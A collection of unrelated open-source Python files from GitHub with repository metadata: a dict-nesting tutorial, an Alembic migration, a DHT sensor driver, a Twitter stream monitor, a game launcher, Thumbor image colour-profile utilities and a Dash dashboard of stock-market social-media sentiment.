pizza " + " with the following toppings:") for topping in pizza['toppings']: print("\t" + topping) # Code 2 # Value associated with each name is now a list # Use the variable langs to hold each value from the dict # as each value is a list # Inside the main dict loop, we use another for loop to run # thru each person's list of fav_lang fav_lang ={ 'je':['python', 'r'], 'sa':['c'], 'ed':['r','go'], 'ph':['python', 'ruby'], } for name, langs in fav_lang.items(): print("\n" + name.title() + "'s fav lang are:") for lang in langs: print("\t " + lang.title()) # Dict in Dict # Define a dict called users with two keys: one each for the # user names. Value associated with each key is a dict. # Loop thru the users dict. Python stores each key in the # variable username and the dict associated with each username # goes into the variable user_info. # Print the username # Accessing the inner dict. The variable user_info has 3 keys # ('first;, 'second', 'location') # Use each key to generate full name and location for each person users = { ' aeinstein': { 'first': 'albert', 'last': 'einstein', 'location':'princeton', }, 'mcurie':{ 'first': 'marie', 'last': 'curie', 'location': 'paris', }, } for username, user_info in users.items(): print("\nUsername: " + username) full_name = user_info['first'] + " " + user_info['last'] location = user_info['location'] print("\tFull name: " + full_name.title()) print("\tLocation: " + location.title())
wenlarry/CrashPython
dict_nesting.py
dict_nesting.py
py
3,383
python
en
code
0
github-code
6
19181221365
"""Add agreed to TOS int field Revision ID: 51398a87b2ef Revises: 95c58503e9c0 Create Date: 2020-12-02 09:43:04.949189 """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = "51398a87b2ef" down_revision = "95c58503e9c0" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column("users", sa.Column("accepted_tos", sa.Integer(), nullable=False, server_default="0")) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_column("users", "accepted_tos") # ### end Alembic commands ###
Almenon/couchers
app/backend/src/couchers/migrations/versions/51398a87b2ef_add_agreed_to_tos_int_field.py
51398a87b2ef_add_agreed_to_tos_int_field.py
py
696
python
en
code
null
github-code
6
10120432429
""" Library and Wrapper for DHT11 and DHT22 sensors. Based on https://github.com/JurassicPork/DHT_PyCom/tree/pulses_get Extensions: Renamed module filename to dht (from dth.py) and added wrapper function For hardware connection: YELLOW/WHITE: PIN1 VCC through GPIO, PIN2: DATA through GPIO, PIN3: NC, PIN4: GDN. Use also a 4.7k PULL-UP for DATA """ import utime import pycom import sensors from machine import Pin import logging class DTHResult: 'DHT sensor result returned by DHT.read() method' ERR_NO_ERROR = 0 ERR_MISSING_DATA = 1 ERR_CRC = 2 error_code = ERR_NO_ERROR temperature = -1 humidity = -1 def __init__(self, error_code, temperature, humidity): self.error_code = error_code self.temperature = temperature self.humidity = humidity def is_valid(self): return self.error_code == DTHResult.ERR_NO_ERROR class DTH: 'DHT sensor (dht11, dht21,dht22) reader class for Pycom' #__pin = Pin('P3', mode=Pin.OPEN_DRAIN) __dhttype = 0 def __init__(self, pin, sensor=0): self.__pin = Pin(pin, mode=Pin.OPEN_DRAIN) self.__dhttype = sensor self.__pin(1) utime.sleep(1.0) def read(self): # pull down to low self.__send_and_sleep(0, 0.019) data = pycom.pulses_get(self.__pin,100) self.__pin.init(Pin.OPEN_DRAIN) self.__pin(1) #print(data) bits = [] for a,b in data: if a ==1 and 18 <= b <= 28: bits.append(0) if a ==1 and 65 <= b <= 75: bits.append(1) #print("longueur bits : %d " % len(bits)) if len(bits) != 40: return DTHResult(DTHResult.ERR_MISSING_DATA, 0, 0) #print(bits) # we have the bits, calculate bytes the_bytes = self.__bits_to_bytes(bits) # calculate checksum and check checksum = self.__calculate_checksum(the_bytes) if the_bytes[4] != checksum: return DTHResult(DTHResult.ERR_CRC, 0, 0) # ok, we have valid data, return it [int_rh, dec_rh, int_t, dec_t, csum] = the_bytes if self.__dhttype==0: #dht11 rh = int_rh #dht11 20% ~ 90% t = int_t #dht11 0..50°C else: #dht21,dht22 rh = ((int_rh * 256) + dec_rh)/10 t = (((int_t & 0x7F) * 256) + dec_t)/10 if (int_t & 0x80) > 0: t *= -1 return DTHResult(DTHResult.ERR_NO_ERROR, t, rh) def __send_and_sleep(self, output, mysleep): self.__pin(output) utime.sleep(mysleep) def __bits_to_bytes(self, bits): the_bytes = [] byte = 0 for i in range(0, len(bits)): byte = byte << 1 if (bits[i]): byte = byte | 1 else: byte = byte | 0 if ((i + 1) % 8 == 0): the_bytes.append(byte) byte = 0 #print(the_bytes) return the_bytes def __calculate_checksum(self, the_bytes): return the_bytes[0] + the_bytes[1] + the_bytes[2] + the_bytes[3] & 255 def get_reading(data_pin, dht_model, vcc_pin=None): """ Returns temperature & humidity reading, for given VCC and DATA pins """ sensors.set_sensor_power_on(vcc_pin) # measurement if dht_model == "DHT11": th = DTH(data_pin, 0) elif dht_model == "DHT22": th = DTH(data_pin, 1) else: th = None temp = None hum = None if th: result = th.read() if result.is_valid(): temp = result.temperature hum = result.humidity else: logging.error("DHT model [" + dht_model + "]: invalid result.") sensors.set_sensor_power_off(vcc_pin) # return results # print('Temperature: {:3.2f}'.format(result.temperature/1.0)) # print('Humidity: {:3.2f}'.format(result.humidity/1.0)) return (temp, hum)
insighio/insighioNode
insighioNode/lib/sensors/dht.py
dht.py
py
3,993
python
en
code
5
github-code
6
42300472031
# -*- coding: utf-8 -*- """ Created on Fri Jun 14 12:43:40 2019 @author: Minh """ import json import requests import tweepy import base64 import sys import time import os import csv from AlarmDialogUtil import showAlertDialog class TwitterMonitor(): twitter_public = twitter_private = access_token = access_token_secret = '' def __init__(self): #fill out with keys self.twitter_public = 'CONSUMER_KEY' self.twitter_private = 'CONSUMER_SECRET' self.access_token = 'ACCESS_TOKEN' self.access_token_secret = 'ACCESS_SECRET' def monitor(self): twitter_ids = list(123432, 32423432, 23432423) #random examples auth = tweepy.OAuthHandler(self.twitter_public, self.twitter_private) auth.set_access_token(self.access_token, self.access_token_secret) api = tweepy.API(auth) streamListener = self.AlertStreamListener() stream = tweepy.Stream(auth = api.auth, listener=streamListener) stream.filter(follow=twitter_ids) class AlertStreamListener(tweepy.StreamListener): def on_status(self, status): if(not hasattr(status, 'retweeted_status') and status.in_reply_to_status_id_str == None and status.in_reply_to_user_id_str == None): title = status.user.name text = "text: {} \n\n url:{}".format(status.text, status.entities['urls']) showAlertDialog(title, text) with open("twitter/TwitterMonitorLog", "a") as file: file.write(json.dumps(status._json) + "\n\n") def on_error(self, status_code): if status_code == 420: print("error on connecting to stream: 420 ; time: {}".format(time.time())) #returning False in on_error disconnects the stream return False if __name__ == "__main__": while True: try: TwitterMonitor().monitor() except Exception as e: showAlertDialog("Error", "Program exited:\n" + str(e)) time.sleep(60)
BeePete/SBV1
twitter_monitor.py
twitter_monitor.py
py
2,214
python
en
code
0
github-code
6
37395020380
import subprocess # Start gameLibrary.py in a subprocess game_process = subprocess.Popen(["python", "gameLibrary.py"]) # Start highscoreChecker.py in a subprocess highscore_checker_process = subprocess.Popen(["python", "highscoreChecker.py"]) # Start highscoreDisplay.py in a subprocess highscore_process = subprocess.Popen(["python", "highscoreDisplay.py"]) # Wait for the game subprocess to finish game_process.wait() # Terminate the other subprocesses highscore_checker_process.terminate() highscore_process.terminate()
Tsukaiyo/cat6Dist
cat6/main.py
main.py
py
545
python
en
code
0
github-code
6
43243448951
import logging from functools import wraps from io import BytesIO from PIL import Image try: from PIL import ImageCms # pylint: disable=ungrouped-imports except ImportError: ImageCms = None DEFAULT_SRGB_PROFILE = None TRANSFORM_FLAGS = 0 else: DEFAULT_SRGB_PROFILE = ImageCms.ImageCmsProfile( ImageCms.createProfile("sRGB") ) TRANSFORM_FLAGS = ( ImageCms.FLAGS["NOTCACHE"] | ImageCms.FLAGS["NOTPRECALC"] | ImageCms.FLAGS["BLACKPOINTCOMPENSATION"] | ImageCms.FLAGS["HIGHRESPRECALC"] ) CONTENT_TYPE = { ".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".gif": "image/gif", ".png": "image/png", ".webp": "image/webp", ".mp4": "video/mp4", ".webm": "video/webm", ".svg": "image/svg+xml", ".tif": "image/tiff", ".tiff": "image/tiff", ".avif": "image/avif", ".heic": "image/heif", ".heif": "image/heif", } EXTENSION = { "image/jpeg": ".jpg", "image/gif": ".gif", "image/png": ".png", "image/webp": ".webp", "video/mp4": ".mp4", "video/webm": ".webm", "image/svg+xml": ".svg", "image/tiff": ".tif", "image/avif": ".avif", "image/heif": ".heic", } logger = logging.getLogger("thumbor") def deprecated(message): def decorator_deprecated(func): @wraps(func) def wrapper_deprecated(*args, **kwargs): logger.warning( "Deprecated function %s%s", func.__name__, message, ) return func(*args, **kwargs) return wrapper_deprecated return decorator_deprecated def get_profile_and_color_space(icc): with BytesIO(icc) as buf: try: profile = ImageCms.ImageCmsProfile(buf) return profile, profile.profile.xcolor_space.strip() except (AttributeError, OSError, TypeError, ValueError): return None, None def get_color_space(img): icc = img.info.get("icc_profile") if not icc: return "RGB" if ImageCms is None: return None _, color_space = get_profile_and_color_space(icc) return color_space def ensure_srgb(img, srgb_profile=None): """ Ensures that an image either has no ICC profile (and so is implicitly sRGB) or has an sRGB color profile. If the image is sRGB, it is returned unchanged. If it has a CMYK or Gray color profile, this function will return an image converted to sRGB. Any color profiles in other color spaces will return None. """ img_info = dict(img.info) icc = img_info.pop("icc_profile", None) if not icc: return img if ImageCms is None: raise RuntimeError("ImageCms is required for color profile utilities") if srgb_profile is not None: srgb_profile = ImageCms.ImageCmsProfile(srgb_profile) else: srgb_profile = DEFAULT_SRGB_PROFILE orig_profile, color_space = get_profile_and_color_space(icc) if not color_space: return None if color_space == "RGB": logger.debug("Returning img (RGB)") return img if color_space not in ("GRAY", "CMYK"): # Other color spaces are rare, but best not to try to convert them. # Upstream understands a None return as meaning it should not # use it for the target encoder. logger.debug("Cannot convert to sRGB; color space = %s", color_space) return None # Probably not possible to have an animated image with CMYK or GRAY icc # profile, but best leave it alone if we have one if getattr(img, "is_animated", False): return None if color_space == "GRAY": pil_mode = "L" else: pil_mode = "CMYK" logger.debug("Converting from %s to sRGB", color_space) transform = ImageCms.ImageCmsTransform( orig_profile, srgb_profile, pil_mode, "RGBA", intent=ImageCms.Intent.RELATIVE_COLORIMETRIC, flags=TRANSFORM_FLAGS, ) src_im = Image.new(pil_mode, img.size, "white") src_im.paste(img) dst_im = Image.new("RGBA", img.size, "white") dst_im.info = img_info dst_im = transform.apply(src_im, dst_im) dst_im = dst_im.convert("RGB") dst_im.info = img_info return dst_im
thumbor/thumbor
thumbor/utils.py
utils.py
py
4,272
python
en
code
9,707
github-code
6
36043542856
pessoas = [] media = cont = 0 while True: pessoas.append({"nome":input("Nome: ").title().strip()}) pessoas[cont]["sexo"] = input("Sexo [F/M]: ").upper().strip() while pessoas[cont]["sexo"] not in "FM": print("ERRO! Por favor, digite apenas M ou F.") pessoas[cont]["sexo"] = input("Sexo [F/M]: ").upper().strip() pessoas[cont]["idade"] = int(input("Idade: ")) media += pessoas[cont]["idade"] cont += 1 es = input("Quer continuar?[S/N]: ").strip() while es not in "snSN": print("ERRO! Responda apenas S ou N.") es = input("Quer continuar?[S/N]: ").strip() if es == "n": break media /= len(pessoas) print("=-" * 35) print(f"A) Foram cadastradas {len(pessoas)} pessoas.") print(f"B) A média de idade é de {media} anos..") print("C) As mulheres cadstrads foram:", end=" ") for c in pessoas: if c["sexo"] == "F": print(c["nome"], end=" ") print() print("D) Lista de pessoas com a idade acima da média:") for c in pessoas: if c["idade"] > media: for k, v in c.items(): print(f"{k:>8} = {v:<14}",end="") print() print("<< ENCERRADO >>")
amandasales/Cadastro
cadastro.py
cadastro.py
py
1,185
python
pt
code
0
github-code
6
2026784639
import msvcrt import zipfile import threading from selenium import webdriver from selenium.webdriver.edge.options import Options from bs4 import BeautifulSoup from concurrent.futures import ThreadPoolExecutor,wait, FIRST_COMPLETED, ALL_COMPLETED resultList = [] unfoundList = [] alltask = [] def main(): file = 'C:\\Users\\niu\Desktop\\上传\CartoonCustomSticker.aab' dependenciesDict = {} threadList = [] if zipfile.is_zipfile(file): print() z = zipfile.ZipFile(file, 'r') namelist = z.namelist() pool = ThreadPoolExecutor(len(namelist)) for zFile in namelist: if zFile.endswith('.version'): # print('"' + zFile.split('/').pop()[:-8] + '":"' + str(z.read(zFile), encoding='utf-8').strip() + '",') # print(zFile.split('/').pop()[:-8]) pair = zFile.split('/').pop()[:-8].split('_') # pool.submit(getLatestVersion,pair[0],pair[1]) # alltask.append(task) t = threading.Thread(target=getLatestVersion,args=(pair[0],pair[1])) t.start() # threadList.append(t) # getLatestVersion(pair[0],pair[1]) # dependenciesDict[pair[0]] = pair[1] print('查询中...') # t.start() # t.join() # wait(alltask,return_when=ALL_COMPLETED) # for group, artifact in dependenciesDict.items(): # thread = threading.Thread(target=getLatestVersion, args=(group, artifact)) # getLatestVersion(group, artifact) # threadList.append(thread) # for thread in threadList: # thread.start() # for thread in threadList: # thread.join() print('结果如下:') for item in resultList: print(item) print('\n未查询到的依赖如下:') print(unfoundList) msvcrt.getch() def getLatestVersion(group_id, artifact_id): global resultList global unfoundList url = f'https://mvnrepository.com/artifact/{group_id}/{artifact_id}' # url = 'https://mvnrepository.com/artifact/androidx.appcompat/appcompat' # 这里是Spring Boot库的URL options = Options() options.use_chromium = True options.add_argument("headless") options.add_argument("disable-gpu") options.add_argument( "user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3") driver = webdriver.Edge(options=options) # 这里使用Edge浏览器 driver.get(url) html = driver.page_source # print(f'groupId:{group_id}, artifact:{artifact_id}') # print(html) soup = BeautifulSoup(html, 'html.parser') version_element = soup.find('a', {'class': 'vbtn release'}) if not version_element is None: latest_version = version_element.text.strip() print(f'"{group_id}:{artifact_id}":"{latest_version}",') resultList.append(f'"{group_id}:{artifact_id}":"{latest_version}",') else: print(f'{group_id}_{artifact_id}') unfoundList.append(f'{group_id}:{artifact_id}') driver.quit() main()
Nienter/mypy
personal/getNewestVersion.py
getNewestVersion.py
py
3,123
python
en
code
0
github-code
6
23261593645
import pygame import math import random #CONST SCREENWIDTH=1280 SCREENHEIGHT=720 # pygame setup pygame.init() screen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT)) clock = pygame.time.Clock() running = True dt = 0 FPS=60 pygame.display.set_caption('TANK') #variables x_target=[] y_target=[] checkVar =1 showHelp=False #functions #Start screen isStartingScreen=True def start_Screen(): screen.fill('white') font = pygame.font.Font('fonts/TitleFont.ttf', 150) sfont = pygame.font.Font('fonts/TitleFont.ttf', 50) title = font.render('TANKS',True,'black','white') titleRect = screen.get_rect(center=(SCREENWIDTH//2+SCREENWIDTH//3+30,SCREENHEIGHT//2+SCREENHEIGHT//3)) subtext= sfont.render("PRESS 'E' TO CONTINUE", True,'black','white') subRect = screen.get_rect(center=(SCREENWIDTH//2+SCREENWIDTH//3,SCREENHEIGHT//2+SCREENHEIGHT//3+200)) screen.blit(title, titleRect) screen.blit(subtext, subRect) class Target: def __init__(self,x,y): self.x = int(x) self.y = int(y) #spawnTarget def spawnTarget(self): for i in range(10): x= random.randint(SCREENWIDTH//2,SCREENWIDTH*0.9) y = random.randint(50,SCREENHEIGHT*0.8) x_target.append(x) y_target.append(y) #drawTarget def drawTarget(self): targetIMG = pygame.image.load('images/target.png').convert_alpha() for i in range(0,10): screen.blit(targetIMG,(x_target[i],y_target[i])) #classes class Player: KEYS = pygame.key.get_pressed() def __init__(self,x,y,alpha,g,V0,t,dt,isShoted,score,bx,by): self.x = int(x) self.y = int(y) self.alpha =int(alpha) self.g = g self.V0 = V0 self.t = t self.dt = dt self.isShoted = isShoted self.score = score self.bx = bx self.by = by def draw(self): #tank_body tank= pygame.image.load('images/Tank.png').convert_alpha() tank= pygame.transform.scale(tank, (65, 40)) screen.blit(tank, (self.x,self.y)) def move(self): if(self.isShoted==False): if(KEYS[pygame.K_a]): self.x-=3 if(KEYS[pygame.K_d]): self.x+=3 def tankTurret(self): global turretPointX,turretPointY if(self.isShoted==False): if(KEYS[pygame.K_w]): self.alpha+=1 if(KEYS[pygame.K_s]): self.alpha-=1 if(self.alpha<=0): self.alpha=0 if(self.alpha>=90): self.alpha=90 theta = math.radians(self.alpha) end_x = (self.x+35) + 40 * math.cos(theta) end_y = (self.y+5) - 40 * math.sin(theta) pygame.draw.line(screen, 'black', (self.x+35,self.y+5), (end_x,end_y),5) pygame.draw.circle(screen, 'black', (end_x,end_y), 2) pygame.draw.circle(screen, 'black', (self.x+35,self.y+5), 2) turretPointX,turretPointY=end_x,end_y def wallCollision(self): if(self.x<=0): self.x=0 if(self.x>=231): self.x=231 def shoot(self): #meth needed for this math XD theta = math.radians(self.alpha) V0x = self.V0 * math.cos(theta) V0y = self.V0 * math.sin(theta) self.bx= turretPointX+V0x *self.t self.by=turretPointY- V0y*self.t+0.5*self.g+self.t**2 pygame.draw.circle(screen, 'black', (int(self.bx),int(self.by)), 5) if(self.bx<0 or self.bx>1280 or self.by>720): self.bx=(self.x+35) self.by=(self.y+5) V0x = self.V0 * math.cos(theta) V0y = self.V0 * math.sin(theta) self.isShoted=False self.t=0 def checkColl(self): for i in range(10): if(self.bx>=x_target[i] and self.bx<=x_target[i]+50 and self.by>=y_target[i] and self.by<=y_target[i]+50 and self.bx<=x_target[i]+50 and self.by<=y_target[i]+50): self.score+=1 x_target[i]=2000 y_target[i]=2000 class gameGUI: def __init__(self,x,y): self.x = int(x) self.y = int(y) def draw(self): ground = pygame.image.load('images/ground.png').convert_alpha() ground = pygame.transform.scale(ground, (300,300)) screen.blit(ground, (0,SCREENHEIGHT*0.62)) font = pygame.font.Font('fonts/TitleFont.ttf', 30) Q = pygame.image.load('images/Q.png').convert_alpha() Q = pygame.transform.scale(Q, (50,50)) screen.blit(Q, (SCREENWIDTH*0.75,SCREENHEIGHT*0.9+5)) Qtxt = font.render("PRESS FOR HELP ", True, 'black','white') QtxtRect = screen.get_rect(center=(SCREENWIDTH+SCREENWIDTH-900,SCREENHEIGHT+SCREENHEIGHT-420)) screen.blit(Qtxt, QtxtRect) angle = font.render("ANGLE "+str(player.alpha), True, 'black','white') angleRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-550)) screen.blit(angle, angleRect) power = font.render("POWER "+str(player.V0), True, 'black','white') powerRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-500)) screen.blit(power, powerRect) scoreText = font.render("SCORE "+str(player.score), True, 'black','white') scoreRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-450)) screen.blit(scoreText, scoreRect) def helpMenu(self): pUD = pygame.image.load('images/powerUPpowerDown.png').convert_alpha() pUD = pygame.transform.scale(pUD, (260,130)) screen.blit(pUD, (0,SCREENHEIGHT*0.1)) font = pygame.font.Font('fonts/TitleFont.ttf', 30) ptext = font.render("POWER +1 ", True, 'black','white') ptextRect = screen.get_rect(center=(SCREENWIDTH-530,SCREENHEIGHT-268)) screen.blit(ptext, ptextRect) ptext2 = font.render("POWER -1 ", True, 'black','white') ptextRect2 = screen.get_rect(center=(SCREENWIDTH-530,SCREENHEIGHT-213)) screen.blit(ptext2, ptextRect2) wasd = pygame.image.load('images/WASD.png').convert_alpha() wasd = pygame.transform.scale(wasd, (260,130)) screen.blit(wasd, (30,SCREENHEIGHT*0.2+50)) WASDT1 = font.render("W,S- ANGLE", True, 'black','white') ptextRect = screen.get_rect(center=(SCREENWIDTH-450,SCREENHEIGHT-140)) screen.blit(WASDT1, ptextRect) WASDT2 = font.render("A,D- MOVE", True, 'black','white') ptextRect = screen.get_rect(center=(SCREENWIDTH-450,SCREENHEIGHT-90)) screen.blit(WASDT2, ptextRect) #class variables player = Player(50, SCREENHEIGHT*0.6,0,9.81,10,0,0.01,False,0,0,0) gui = gameGUI(0,SCREENHEIGHT-200) target= Target(0, 0) while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False #Controls KEYS = pygame.key.get_pressed() if(KEYS[pygame.K_ESCAPE]): running=False if(KEYS[pygame.K_q]): showHelp= not showHelp if(KEYS[pygame.K_e]): isStartingScreen=False if(KEYS[pygame.K_SPACE]): player.isShoted = True if(player.isShoted==False): if(KEYS[pygame.K_UP]): player.V0 +=1 if(KEYS[pygame.K_DOWN]): player.V0 -=1 if(player.V0<=10): player.V0=10 if(player.V0>=50): player.V0=50 #GAME section if(isStartingScreen==True): start_Screen() else: screen.fill('white') gui.draw() target.spawnTarget() target.drawTarget() if(player.score/10==checkVar and player.score!=0): x_target.clear() y_target.clear() target.spawnTarget() target.drawTarget() checkVar+=1 if(showHelp==True): gui.helpMenu() player.checkColl() player.draw() player.move() player.tankTurret() player.wallCollision() if(player.isShoted): player.shoot() player.t+=0.2 #pygame essentials pygame.display.flip() dt = clock.tick(FPS) / 1000 pygame.quit()
stefanstojkoviic/Tenkici
game.py
game.py
py
8,210
python
en
code
0
github-code
6
72136709947
#Plots import re import plotly.express as px #DASHBOARD import dash import dash_html_components as html import dash_core_components as dcc from dash.dependencies import Input, Output import dash_bootstrap_components as dbc import dash_table from dash.exceptions import PreventUpdate import tweepy ########## from data import * from update_db import * from graphs import * from semanticsearch import get_similar_sentences app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP]) server = app.server # for Heroku deployment tabs_styles = { # 'height': '44px', 'background': '#393939' } tab_style = { 'borderBottom': '1px solid #d6d6d6', 'padding': '6px', 'fontWeight': 'bold' } tab_selected_style = { 'borderTop': '1px solid #d6d6d6', 'borderBottom': '1px solid #d6d6d6', 'backgroundColor': '#119DFF', 'color': 'white', 'padding': '6px' } ################################ DATA PROCESSING ######################################### stockprice_number_of_days = '8d' stocks_screenerview = pd.read_csv('socialmediadata/stocks_screenerview_sectors.csv') consumer_key = "" consumer_secret = "" access_token = "326146455-" access_token_secret = "" # Creating the authentication object auth = tweepy.OAuthHandler(consumer_key, consumer_secret) # Setting your access token and secret auth.set_access_token(access_token, access_token_secret) # Creating the API object by passing in auth information api = tweepy.API(auth) def top_words_on_key(df, colum_name, Source, key, keytype, top_n): df_words = " ".join(df[colum_name]).split(' ') if key == '@': df_ticker_list = re.findall(r'[@][A-Za-z]+', str(df_words)) elif key == '#': df_ticker_list = re.findall(r'[#][A-Za-z]+', str(df_words)) else: df_ticker_list = re.findall(r'[$][A-Za-z]+', str(df_words)) # print(df_ticker_list) df_top_tickers = pd.Series(df_ticker_list).value_counts()[:top_n].to_frame('count').reset_index() df_top_tickers['Source'] = Source df_top_tickers['keytype'] = keytype # print(df_top_tickers) return df_top_tickers LEFT_COLUMN = dbc.Navbar( [ dbc.Row( [ dbc.Col(html.H4(" Stock Market Insights"),md=6), html.Br(), dbc.Col( html.Label(" Stock Ticker:"),md=2), dbc.Col( dcc.Dropdown(id='dropdown',options=[ {'label': 'Microsoft (MSFT)', 'value': 'MSFT'}, {'label': 'Tesla (TSLA)', 'value': 'TSLA'}, {'label': 'TMobile (TMUS)', 'value': 'TMUS'}],value='TMUS',clearable=False ),md=4) ] ) ] ) def homepage_stockmarket_fig(): namedent_agg_sorted = stocks_screenerview.groupby(['Sector']).apply( lambda x: x.sort_values(['Volume'], ascending=False)).reset_index( drop=True) namedent_agg_top5_df = namedent_agg_sorted.groupby(['Sector']).head(5) namedent_agg_top5_df['Ticker_Company'] = namedent_agg_top5_df['Ticker'] + '(' + namedent_agg_top5_df[ 'Company'] + ')' stockvolume_sunburst_fig = px.sunburst(namedent_agg_top5_df, path=['Sector', 'Ticker'], values='Volume', hover_name="Ticker_Company",color_discrete_sequence=px.colors.qualitative.Pastel) stockvolume_sunburst_fig.update_layout( title=dict(text="<b>Top Tickers based on <br> Actual Stock Volume</b>"), plot_bgcolor='#5B5959', font=dict(size=13) ) tweet_df = get_data_from_db( db_table_name = 'socialmediadata.stock_twitterdata') reddit_df = get_data_from_db(db_table_name='socialmediadata.stock_redditdata') reddit_top_tickers = top_words_on_key(reddit_df, 'text', 'Reddit', '$', 'Tickers', 5) twitter_top_tickers = top_words_on_key(tweet_df, 'text', 'Twitter', '$', 'Tickers', 5) top_social_media = pd.concat([reddit_top_tickers, twitter_top_tickers]) top_tickers_socialmedia_sunburstfig = px.sunburst(top_social_media, path=['Source','index'], values='count',color_discrete_sequence=px.colors.qualitative.Pastel) top_tickers_socialmedia_sunburstfig.update_layout( title=dict(text="<b>Top Tickers based on <br> Volume(No Of Tweets) on Social Media</b>"), #treemapcolorway=['#0000A0', '#E6A000', '#009FEB'], plot_bgcolor='#5B5959', font=dict(size=12) ) df_top_reddit_users = pd.Series(reddit_df['user']).value_counts()[:5].to_frame('count').reset_index() df_top_reddit_users['Source']='Reddit' df_top_twitter_users = pd.Series(tweet_df['user']).value_counts()[:5].to_frame('count').reset_index() df_top_twitter_users['Source'] = 'Twitter' top_social_users = pd.concat([df_top_reddit_users, df_top_twitter_users]) top_users_socialmedia_sunburstfig = px.bar(top_social_users, x='count', y='index', color="Source", barmode='group') top_users_socialmedia_sunburstfig.update_layout( title=dict(text="<b>Top Users on Social Media</b>"), # treemapcolorway=['#0000A0', '#E6A000', '#009FEB'], plot_bgcolor='#5B5959', font=dict(size=12) ) final_namedentitydf = pd.read_csv('socialmediadata/namedentitydf.csv') socialmedia_namedentity_fig = px.treemap(final_namedentitydf, path=['source', 'Label', 'Text'], color_discrete_sequence=px.colors.qualitative.Pastel,values='count') socialmedia_namedentity_fig.update_layout( title=dict(text="<b>Stock News Named Entities from Twitter,Reddit,News and Blogs </b>"), #treemapcolorway=['#0000A0', '#E6A000', '#009FEB'], font=dict(size=14) ) return stockvolume_sunburst_fig,top_tickers_socialmedia_sunburstfig,socialmedia_namedentity_fig,top_users_socialmedia_sunburstfig stockvolume_sunburst_fig,top_tickers_socialmedia_sunburstfig,\ socialmedia_namedentity_fig,top_users_socialmedia_sunburstfig = homepage_stockmarket_fig() HOME_BODY = [ dbc.Row( [ dbc.Col(dcc.Graph(id="stockvolume_sunburst_fig",figure=stockvolume_sunburst_fig),width=4), dbc.Col(dcc.Graph(id="top_tickers_socialmedia_sunburstfig",figure=top_tickers_socialmedia_sunburstfig),width=4), dbc.Col(dcc.Graph(id="top_users_socialmedia_sunburstfig",figure=top_users_socialmedia_sunburstfig),width=4) ] ), dbc.Row( [ dbc.Col(dcc.Graph(id="socialmedia_namedentity_fig", figure=socialmedia_namedentity_fig), width=12) ] ), html.Br(), dbc.Col(html.H2("Semantic Search on Twitter,Reddit,News and Blogs"),md=11), html.Br(), dbc.Row( [ dbc.Col(dbc.Card(dcc.Input(id='semantic_search', type="text", value="Stock news related to Healthcare Sector", placeholder="Twitter Search")), md=8) ]), dbc.Row( [ dbc.Col(dbc.Card(html.Label(id='semanticsearchtable')), width=11) ]), html.Br(), dbc.Col(html.H2("Real Time Twitter Streaming Insights"),md=11), html.Br(), dbc.Row( [ dbc.Col(dcc.Input(id='twitter_search',type="text", value="stockmarket",placeholder="Twitter Search"), md=8) ]), html.Br(), dcc.Interval( id='interval-component', interval=1 * 80000, # in milliseconds n_intervals=0 ), dbc.Row( [ dbc.Col(dbc.Card(html.Label(id='tweettable')), width=7) ]) ] SOCIALMEDIA_BODY = [ html.Br(), dbc.Row( [ dbc.Col(dbc.Card(html.Div(id='stockdescription')), width=12) ], ), dbc.Row( [ #dbc.Col(dcc.Graph(id="tophashtagmentionfunnelchart"),width=3), dbc.Col(dbc.Spinner(dcc.Graph(id="tickertopmentionssunburstplot"), type = "grow"),width=4), dbc.Col(dbc.Spinner(dcc.Graph(id="stockfundchart"), type = "grow"),width=7) ], ), dbc.Row( [ dbc.Col(dbc.Spinner(dcc.Graph(id="stockchart"), type="grow"), width=11) ], ), dbc.Row( [ dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentlinechart"), type = "grow"),width=11) ], ), dbc.Row( [ dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentfunnelallchart"), type="grow"),width=4), dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentfunnelchart"), type="grow"),width=8) ], ), dbc.Row( [ dbc.Col(dcc.RangeSlider(id='sentiment-slider',min=-1,max=1,step=0.2,value=[0, 0.5]),width=4), ], ), dbc.Row( [ dbc.Col( [ dbc.Row(dbc.Spinner(dcc.Graph(id="twitterwordcloudplot"),type = "grow")), dbc.Row(dbc.Spinner(dcc.Graph(id="redditwordcloudplot"),type = "grow")) ],width=3 ), dbc.Col(dbc.Card(html.Label(id='sentimenttable')), width=7) ] ), dbc.Col(html.H2("Real Time Tweets from STOCKTWITS"),md=11), dbc.Col(dbc.Spinner(html.Label(id='stocktwits-output'),type = "grow"), width=11) ] NEWS_BODY = [ dbc.Col(dbc.Spinner(dbc.Card(html.Label(id='newsarticletable'))), width=11), dbc.Row( [ dbc.Col(dbc.Spinner(dcc.Graph(id="newsngramfig")),width=4), dbc.Col(dbc.Spinner(dcc.Graph(id="newswordcloudfig")), width=4) ], ), dbc.Col(dbc.Spinner(dbc.Card(dcc.Graph(id='newsnamedentity'))),width=11) ] BODY = dbc.Container\ ([ dbc.Row( dbc.Col( dcc.Tabs(id="tabs-styled-with-inline", value='home', children=[ dcc.Tab(label='HOME', value='home',style=tab_style, selected_style=tab_selected_style), dcc.Tab(label='TICKER-SOCIALMEDIA SENTIMENTS', value='socialmedia',style=tab_style, selected_style=tab_selected_style), dcc.Tab(label='TICKER-NEWS ', value='news',style=tab_style, selected_style=tab_selected_style), ] ),width={"size": 8, "offset": 2},md={"size": 10, "offset": 1},lg={"size": 12, "offset": 0} ),className="bottom32"), #html.Div(dcc.Loading(html.Div(id="main_div"),type="cube", style={"marginTop": "150px"}),style={"minHeight": "500px"}) html.Div(html.Div(id="main_div")) ], style={"maxWidth": "1340px"} ) app.layout = html.Div(children=[LEFT_COLUMN,BODY]) 